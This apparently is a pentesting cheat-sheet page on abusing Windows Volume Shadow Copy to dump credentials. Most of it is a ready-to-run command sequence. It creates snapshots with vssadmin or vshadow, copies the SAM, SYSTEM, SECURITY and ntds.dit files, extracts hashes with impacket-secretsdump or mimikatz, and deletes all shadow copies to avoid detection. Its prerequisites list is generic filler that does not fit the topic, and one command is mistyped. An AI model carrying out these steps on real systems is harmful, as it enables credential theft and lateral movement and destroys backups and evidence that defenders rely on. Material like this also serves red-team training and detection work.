Skip to main content

💥 Shadow Copy

🧠 What’s the Deal?​

Shadow Copies allow attackers to bypass file locks and access sensitive files.

Volume Shadow Copy Service (VSS) is a Windows feature that automatically creates point-in-time backups (snapshots) of files, including locked or in-use files like the SAM, SYSTEM, and SECURITY hives.

Attackers can abuse this feature to dump NTLM password hashes, DPAPI secrets, and even recover deleted files.

🎯 What’s the Big Win?​

What’s the attacker trying to pull off here?

  • Gain unauthorized access
  • Extract sensitive data
  • Escalate privileges
  • Lateral movement across the network

🧰 Gear Up (Prereqs)​

Don’t go in empty-handed. What do you need beforehand?

  • Access to target or vulnerable endpoint
  • Specific app version or config
  • Recon data (subdomain, login page, etc.)
  • Tools (e.g., Burp, nmap, ffuf, etc.)

🚀 Launch Sequence (How-To)​

Below are the steps to perform shadow copy attack

Check if shadow copies exist​

powershell commands to check for shadow copies

vssadmin list shadows
wmic shadowcopy list brief

Create a new Shadow Copy​

Attacker can create a new shadow copy if he has admin rights, Below is powershell command for same

vssadmin create shadow /for=C:

# Output
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

OR use vshadow.exe utility to create it

vshadow.exe -nw -p C:
  • -nw → no writers (faster, ignores VSS writers)
  • -p → persistent shadow copy

Dump Sensitive Files​

These Files are normally locaked form the shadow copy, Use cmd prompt with elevated user to copy it

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\temp\SECURITY
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit.bak

Can be used with below command

impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

OR

mimikatz # lsadump::sam /system:SYSTEM /sam:SAM

Delete Shadow Copies​

after performing your activity you can delete shadow copies to avoid detection later

vssadmin delete shadows /all /quie

OR

vshadow.exe -da